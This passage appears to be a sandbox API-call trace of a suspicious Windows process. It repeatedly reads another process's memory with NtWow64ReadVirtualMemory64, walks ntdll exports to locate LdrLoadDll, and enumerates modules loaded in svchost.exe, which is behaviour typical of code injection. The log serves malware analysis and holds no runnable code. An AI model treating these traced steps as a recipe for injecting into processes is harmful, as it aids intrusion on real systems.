BaseAddress=0x28bcf000, Buffer=0x7ffb, BufferSize=0xbff000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.368] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd0000, Buffer=0x7ffb, BufferSize=0xc00000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.369] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd1000, Buffer=0x7ffb, BufferSize=0xc01000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.369] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd2000, Buffer=0x7ffb, BufferSize=0xc02000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.369] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd3000, Buffer=0x7ffb, BufferSize=0xc03000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.370] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd4000, Buffer=0x7ffb, BufferSize=0xc04000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.370] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd5000, Buffer=0x7ffb, BufferSize=0xc05000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.370] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd6000, Buffer=0x7ffb, BufferSize=0xc06000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.371] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd7000, Buffer=0x7ffb, BufferSize=0xc07000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.371] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd8000, Buffer=0x7ffb, BufferSize=0xc08000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.372] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd9000, Buffer=0x7ffb, BufferSize=0xc09000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.372] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bda000, Buffer=0x7ffb, BufferSize=0xc0a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.372] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bdb000, Buffer=0x7ffb, BufferSize=0xc0b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.374] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bdc000, Buffer=0x7ffb, BufferSize=0xc0c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.374] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bdd000, Buffer=0x7ffb, BufferSize=0xc0d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.375] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bde000, Buffer=0x7ffb, BufferSize=0xc0e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.375] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bdf000, Buffer=0x7ffb, BufferSize=0xc0f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.376] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be0000, Buffer=0x7ffb, BufferSize=0xc10000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.376] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be1000, Buffer=0x7ffb, BufferSize=0xc11000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.376] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be2000, Buffer=0x7ffb, BufferSize=0xc12000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.377] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be3000, Buffer=0x7ffb, BufferSize=0xc13000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.377] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be4000, Buffer=0x7ffb, BufferSize=0xc14000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.378] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be5000, Buffer=0x7ffb, BufferSize=0xc15000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.378] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be6000, Buffer=0x7ffb, BufferSize=0xc16000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.378] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be7000, Buffer=0x7ffb, BufferSize=0xc17000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.379] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be8000, Buffer=0x7ffb, BufferSize=0xc18000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.685] lstrcmpA (lpString1="A_SHAFinal", lpString2="LdrLoadDll") returned -1 [0140.686] lstrcmpA (lpString1="A_SHAInit", lpString2="LdrLoadDll") returned -1 [0140.686] lstrcmpA (lpString1="A_SHAUpdate", lpString2="LdrLoadDll") returned -1 [0140.686] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="LdrLoadDll") returned -1 [0140.686] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="LdrLoadDll") returned -1 [0140.686] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="LdrLoadDll") returned -1 [0140.686] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="LdrLoadDll") returned -1 [0140.686] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="LdrLoadDll") returned -1 [0140.686] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="LdrLoadDll") returned -1 [0140.686] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="LdrLoadDll") returned -1 [0140.686] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="LdrLoadDll") returned -1 [0140.686] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="LdrLoadDll") returned -1 [0140.686] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="LdrLoadDll") returned -1 [0140.686] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="LdrLoadDll") returned -1 [0140.686] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="LdrLoadDll") returned -1 [0140.686] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="LdrLoadDll") returned -1 [0140.686] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="LdrLoadDll") returned -1 [0140.686] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="LdrLoadDll") returned -1 [0140.686] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="LdrLoadDll") returned -1 [0140.686] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="LdrLoadDll") returned -1 [0140.686] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="LdrLoadDll") returned -1 [0140.686] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="CsrClientCallServer", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="CsrGetProcessId", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="DbgBreakPoint", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="DbgPrint", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="DbgPrintEx", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="DbgPrompt", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="DbgUiContinue", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="LdrLoadDll") returned -1 [0140.687] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="LdrLoadDll") returned -1 [0140.689] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="LdrLoadDll") returned -1 [0140.689] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="LdrLoadDll") returned -1 [0140.689] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="LdrLoadDll") returned -1 [0140.689] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="LdrLoadDll") returned -1 [0140.689] lstrcmpA (lpString1="EtwEventEnabled", lpString2="LdrLoadDll") returned -1 [0140.689] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="LdrLoadDll") returned -1 [0140.689] lstrcmpA (lpString1="EtwEventRegister", lpString2="LdrLoadDll") returned -1 [0140.689] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="LdrLoadDll") returned -1 [0140.689] lstrcmpA (lpString1="EtwEventUnregister", lpString2="LdrLoadDll") returned -1 [0140.689] lstrcmpA (lpString1="EtwEventWrite", lpString2="LdrLoadDll") returned -1 [0140.689] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="LdrLoadDll") returned -1 [0140.689] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="LdrLoadDll") returned -1 [0140.689] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="LdrLoadDll") returned -1 [0140.689] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="LdrLoadDll") returned -1 [0140.689] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="LdrLoadDll") returned -1 [0140.689] lstrcmpA (lpString1="EtwEventWriteString", lpString2="LdrLoadDll") returned -1 [0140.689] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="LdrLoadDll") returned -1 [0140.689] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="LdrLoadDll") returned -1 [0140.689] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="LdrLoadDll") returned -1 [0140.689] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="LdrLoadDll") returned -1 [0140.689] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="LdrLoadDll") returned -1 [0140.689] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="LdrLoadDll") returned -1 [0140.689] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="LdrLoadDll") returned -1 [0140.690] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="LdrLoadDll") returned -1 [0140.690] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="LdrLoadDll") returned -1 [0140.690] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="LdrLoadDll") returned -1 [0140.690] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="LdrLoadDll") returned -1 [0140.690] lstrcmpA (lpString1="EtwReplyNotification", lpString2="LdrLoadDll") returned -1 [0140.690] lstrcmpA (lpString1="EtwSendNotification", lpString2="LdrLoadDll") returned -1 [0140.690] lstrcmpA (lpString1="EtwSetMark", lpString2="LdrLoadDll") returned -1 [0140.690] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="LdrLoadDll") returned -1 [0140.690] lstrcmpA (lpString1="EtwTraceMessage", lpString2="LdrLoadDll") returned -1 [0140.690] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="LdrLoadDll") returned -1 [0140.690] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="LdrLoadDll") returned -1 [0140.690] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="LdrLoadDll") returned -1 [0140.690] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="KiUserInvertedFunctionTable", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="LdrAccessResource", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="LdrAddRefDll", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="LdrEnumResources", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="LdrFindResource_U", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="LdrLoadDll") returned -1 [0140.691] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="LdrLoadDll") returned -1 [0140.692] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="LdrLoadDll") returned -1 [0140.692] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="LdrLoadDll") returned -1 [0140.692] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="LdrLoadDll") returned -1 [0140.692] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="LdrLoadDll") returned -1 [0140.692] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="LdrLoadDll") returned -1 [0140.692] lstrcmpA (lpString1="LdrGetDllPath", lpString2="LdrLoadDll") returned -1 [0140.692] lstrcmpA (lpString1="LdrGetFailureData", lpString2="LdrLoadDll") returned -1 [0140.692] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="LdrLoadDll") returned -1 [0140.692] lstrcmpA (lpString1="LdrGetKnownDllSectionHandle", lpString2="LdrLoadDll") returned -1 [0140.692] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="LdrLoadDll") returned -1 [0140.692] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="LdrLoadDll") returned -1 [0140.692] lstrcmpA (lpString1="LdrGetProcedureAddressForCaller", lpString2="LdrLoadDll") returned -1 [0140.692] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="LdrLoadDll") returned -1 [0140.692] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="LdrLoadDll") returned -1 [0140.692] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="LdrLoadDll") returned -1 [0140.692] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="LdrLoadDll") returned -1 [0140.692] lstrcmpA (lpString1="LdrLoadDll", lpString2="LdrLoadDll") returned 0 [0140.692] VirtualFree (lpAddress=0xb30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.741] GetModuleHandleW (lpModuleName="NTDLL.DLL") returned 0x778f0000 [0140.742] GetProcAddress (hModule=0x778f0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77968930 [0140.742] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x174, ProcessInformationClass=0x0, ProcessInformation64=0x19ef8c, ProcessInformationLength=0x30, ReturnLength=0x19efe4 | out: ProcessInformation64=0x19ef8c, ReturnLength=0x19efe4) returned 0x0 [0140.742] LocalAlloc (uFlags=0x0, uBytes=0x200) returned 0x629120 [0140.742] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x61df68 [0140.743] LocalFree (hMem=0x629120) returned 0x0 [0140.743] LocalFree (hMem=0x61df68) returned 0x0 [0140.743] VirtualAlloc (lpAddress=0x0, dwSize=0x7e4, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000 [0140.744] GetModuleHandleW (lpModuleName="NTDLL.DLL") returned 0x778f0000 [0140.744] GetProcAddress (hModule=0x778f0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77968930 [0140.744] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x174, ProcessInformationClass=0x0, ProcessInformation64=0x19ef8c, ProcessInformationLength=0x30, ReturnLength=0x19efe4 | out: ProcessInformation64=0x19ef8c, ReturnLength=0x19efe4) returned 0x0 [0140.744] LocalAlloc (uFlags=0x0, uBytes=0x200) returned 0x629120 [0140.744] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x61df68 [0140.744] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x25e000, Buffer=0x0, BufferSize=0x61df68, NumberOfBytesRead=0x28 | out: Buffer=0x0, NumberOfBytesRead=0x28) returned 0x0 [0140.744] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28c45200, Buffer=0x7ffb, BufferSize=0x61df90, NumberOfBytesRead=0x40 | out: Buffer=0x7ffb, NumberOfBytesRead=0x40) returned 0x0 [0140.744] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x803460, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0140.745] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x8030c8, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x3e | out: Buffer=0x0, NumberOfBytesRead=0x3e) returned 0x0 [0140.745] StrRChrA (lpStart="C:\\Windows\\system32\\svchost.exe", lpEnd=0x0, wMatch=0x5c) returned="\\svchost.exe" [0140.745] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x8032d0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0140.745] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x8031c0, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x3a | out: Buffer=0x0, NumberOfBytesRead=0x3a) returned 0x0 [0140.745] StrRChrA (lpStart="C:\\Windows\\SYSTEM32\\ntdll.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ntdll.dll" [0140.745] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x803910, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0140.745] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x803aa0, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x40 | out: Buffer=0x0, NumberOfBytesRead=0x40) returned 0x0 [0140.745] StrRChrA (lpStart="C:\\Windows\\system32\\KERNEL32.DLL", lpEnd=0x0, wMatch=0x5c) returned="\\KERNEL32.DLL" [0140.745] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x803e10, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0140.746] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x803fa0, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x44 | out: Buffer=0x0, NumberOfBytesRead=0x44) returned 0x0 [0140.746] StrRChrA (lpStart="C:\\Windows\\system32\\KERNELBASE.dll", lpEnd=0x0, wMatch=0x5c) returned="\\KERNELBASE.dll" [0140.746] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x805270, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0140.746] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x8038a0, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x3e | out: Buffer=0x0, NumberOfBytesRead=0x3e) returned 0x0 [0140.746] StrRChrA (lpStart="C:\\Windows\\system32\\sechost.dll", lpEnd=0x0, wMatch=0x5c) returned="\\sechost.dll" [0140.746] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x805460, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0140.747] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x8055f0, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x3c | out: Buffer=0x0, NumberOfBytesRead=0x3c) returned 0x0 [0140.747] StrRChrA (lpStart="C:\\Windows\\system32\\RPCRT4.dll", lpEnd=0x0, wMatch=0x5c) returned="\\RPCRT4.dll" [0140.747] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x805880, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0140.747] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x805a10, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x40 | out: Buffer=0x0, NumberOfBytesRead=0x40) returned 0x0 [0140.747] StrRChrA (lpStart="C:\\Windows\\SYSTEM32\\ucrtbase.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ucrtbase.dll" [0140.747] LocalFree (hMem=0x629120) returned 0x0 [0140.747] LocalFree (hMem=0x61df68) returned 0x0 [0140.748] lstrcmpiA (lpString1="svchost.exe", lpString2="NTDLL.DLL") returned 1 [0140.748] StrChrA (lpStart="svchost.exe", wMatch=0x2e) returned=".exe" [0140.748] lstrcmpiA (lpString1="svchost", lpString2="NTDLL.DLL") returned 1 [0140.748] lstrcmpiA (lpString1="ntdll.dll", lpString2="NTDLL.DLL") returned 0 [0140.748] VirtualFree (lpAddress=0x5f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.748] VirtualAlloc (lpAddress=0x0, dwSize=0x1c1000, flAllocationType=0x3000, flProtect=0x4) returned 0xb30000 [0140.749] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b00000, Buffer=0x7ffb, BufferSize=0xb30000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.749] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b01000, Buffer=0x7ffb, BufferSize=0xb31000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.749] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b02000, Buffer=0x7ffb, BufferSize=0xb32000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.828] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b03000, Buffer=0x7ffb, BufferSize=0xb33000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.828] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b04000, Buffer=0x7ffb, BufferSize=0xb34000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.828] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b05000, Buffer=0x7ffb, BufferSize=0xb35000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.829] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b06000, Buffer=0x7ffb, BufferSize=0xb36000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.829] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b07000, Buffer=0x7ffb, BufferSize=0xb37000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.830] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b08000, Buffer=0x7ffb, BufferSize=0xb38000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.830] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b09000, Buffer=0x7ffb, 